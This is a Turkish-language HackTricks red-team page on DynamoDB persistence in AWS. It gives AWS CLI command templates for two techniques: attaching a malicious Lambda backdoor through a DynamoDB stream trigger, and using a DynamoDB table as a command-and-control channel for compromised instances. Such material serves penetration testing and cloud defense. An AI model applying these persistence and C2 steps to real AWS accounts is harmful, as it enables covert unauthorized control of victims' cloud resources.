AWS - DynamoDB Kalıcılık

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

DynamoDB

Daha fazla bilgi için erişin:

AWS - DynamoDB Enum

DynamoDB Tetikleyicileri ile Lambda Backdoor

DynamoDB tetikleyicilerini kullanarak, saldırgan bir tabloya kötü amaçlı bir Lambda fonksiyonu ilişkilendirerek sinsi backdoor oluşturabilir. Bir öğe eklendiğinde, değiştirildiğinde veya silindiğinde Lambda fonksiyonu tetiklenebilir ve bu, saldırganın AWS hesabı içinde istediği kodu çalıştırmasına olanak sağlar.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Kalıcılığı sürdürmek için, saldırgan DynamoDB tablosunda öğeler oluşturabilir veya değiştirebilir; bu, kötü amaçlı Lambda function’ı tetikleyecektir. Bu, saldırganın Lambda function ile doğrudan etkileşime girmeden AWS account içinde kod çalıştırmasına olanak tanır.

DynamoDB bir C2 Channel olarak

Bir saldırgan, komut içeren öğeler oluşturarak ve bu komutları almak ve yürütmek için ele geçirilmiş instances veya Lambda functions kullanarak bir DynamoDB tablosunu command and control (C2) channel olarak kullanabilir.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Ele geçirilmiş instances veya Lambda functions, yeni komutlar için C2 tablosunu periyodik olarak kontrol edebilir, bunları çalıştırabilir ve isteğe bağlı olarak sonuçları tabloya raporlayabilir. Bu, saldırganın ele geçirilmiş kaynaklar üzerinde persistence ve kontrol sağlamasına olanak tanır.

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin